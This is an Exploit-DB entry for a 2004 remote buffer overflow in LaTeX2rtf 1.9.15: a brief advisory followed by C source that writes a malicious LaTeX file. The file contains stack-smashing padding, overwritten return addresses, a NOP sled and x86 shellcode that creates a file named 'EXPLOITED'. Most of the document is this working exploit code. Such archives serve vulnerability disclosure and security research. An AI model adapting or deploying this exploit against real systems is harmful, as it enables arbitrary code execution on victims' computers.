LaTeX2rtf 1.9.15 - Remote Buffer Overflow

EDB-ID:

24622




Platform:

Linux

Date:

2004-09-21


/*
source: https://www.securityfocus.com/bid/11233/info

It is reported that LaTeX2rtf is susceptible to a remote buffer overflow vulnerability when handling malformed files. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable computer to gain unauthorized access. This issue is due to a failure of the application to perform proper bounds checks before copying data into a fixed sized memory buffer.

Version 1.9.15 of LaTeX2rtf is reported vulnerable to this issue. Other versions may also be affected.
*/

char center[] = {
  0x59                         /*   cx = *sp++                      */
, 0x31, 0xc0                   /*   ax ^= ax                        */
, 0x40                         /*   ++ax                            */
, 0x40                         /*   ++ax                            */
, 0x40                         /*   ++ax                            */
, 0xc1, 0xe0, 0x07             /*   ax <<= 7                        */
, 0x50                         /*   *--sp = ax                 0600 */
, 0xb8, 0x12, 0x34, 0x56, 0x02 /*   ax = 0x02563412                 */
, 0xc1, 0xe8, 0x18             /*   ax >>= 24                       */
, 0xc1, 0xe0, 0x08             /*   ax <<= 8                        */
, 0x50                         /*   *--sp = ax          512:O_CREAT */
, 0x51                         /*   *--sp = cx          "EXPLOITED" */
, 0x31, 0xc0                   /*   ax ^= ax                        */
, 0xb0, 0x05                   /*   ax = (ax & ~255) + 5            */
, 0x50                         /*   *--sp = ax               5:open */
, 0xcd, 0x80                   /*   syscall                         */
, 0x31, 0xc0                   /*   ax ^= ax                        */
, 0x50                         /*   *--sp = ax                    0 */
, 0x40                         /*   ++ax                            */
, 0x50                         /*   *--sp = ax               1:exit */
, 0xcd, 0x80                   /*   syscall                         */
} ;

int main()
 
  int i;

  printf("\\def\\row#1{");

  for (i = 0;i < 1024;++i)
    putchar('x');
  for (i = 0;i < 6;++i) {
    /* preserve args[0] */
    putchar(0x40); putchar(0x6d); putchar(0x08); putchar(0x08);
  }
  for (i = 0;i < 5;++i) {
    /* smasher */
    putchar(0x40); putchar(0xf9); putchar(0xbf); putchar(0xbf);
  }

  for (i = 0;i < 256;++i)
    putchar(0x90);

  putchar(0xeb); putchar(sizeof(center));
  /* 0xeb 0x07   means   ip += 7 */
  /* assuming here that center has at most 255 bytes */

  for (i = 0;i < sizeof center;++i)
    putchar(center[i]);

  putchar(0xe8);
  putchar(251 - sizeof center); putchar(0xff); putchar(0xff); putchar(0xff);
  /* 0xe8 0xf4 0xff 0xff 0xff   means   *--sp = ip; ip -= 12 */ 

  printf("EXPLOITED");

  printf("}\n");
  printf("\\begin{document}\n");
  printf("\\row a\n");
  printf("\\end{document}\n");
}